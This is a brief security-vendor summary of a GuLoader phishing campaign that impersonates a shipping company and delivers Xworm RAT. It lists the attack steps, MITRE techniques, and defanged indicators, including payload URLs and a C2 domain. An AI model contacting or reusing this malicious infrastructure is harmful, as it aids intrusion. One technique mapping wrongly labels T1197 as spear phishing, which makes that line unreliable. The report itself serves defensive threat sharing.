Recent findings by AhnLab SEcurity Intelligence Center revealed the use of GuLoader malware disseminated through a phishing email masquerading as communication from a well-known international shipping company. The email, intercepted via an ASEC honeypot, prompted recipients to check their post-paid customs tax and included an attachment that executed malicious scripts. Affected: phishing email, GuLoader malware, Xworm RAT, email security
Keypoints :
- AhnLab SEcurity Intelligence Center (ASEC) identified GuLoader malware distributed via phishing emails.
- The phishing email impersonated a well-known international shipping company.
- The email attachment contained obfuscated VBScript that executed a PowerShell script.
- The PowerShell script downloaded additional malicious files from an external source.
- A registry key was created to ensure persistence of the malware.
- GuLoader has been distributing since December 2019 as a downloader for various malware.
- Users are advised to avoid opening attachments from unknown sources.
MITRE Techniques :
- T1071.001 – Application Layer Protocol: PowerShell script communicates with external servers to download payloads.
- T1059.005 – Command and Scripting Interpreter: VBScript is used to execute a PowerShell script.
- T1197 – Spear Phishing: The initial compromise occurs through a phishing email.
- T1547.001 – Boot or Logon Autostart Execution: A registry key is created to maintain persistence.
- T1055 – Process Injection: Xworm RAT is executed as a child process through msiexec.exe.
Indicator of Compromise :
- [MD5] 0477406f83847d43a3b668cc1e75185f
- [MD5] 1ce8509eabe2a293376d9b70044922fd
- [MD5] 9c14df330dea5dfaab7a4303a3296779
- [MD5] a501b4c09476b8f5ab505c6578bf9f9e
- [URL] https[:]//planachiever[.]au/admin-admin/Belejrers[.]fla
- [URL] https[:]//planachiever[.]au/admin-admin/bPeMVYr142[.]bin
- [FQDN] tripplebanks[.]duckdns[.]org
Full Story: https://asec.ahnlab.com/en/87002/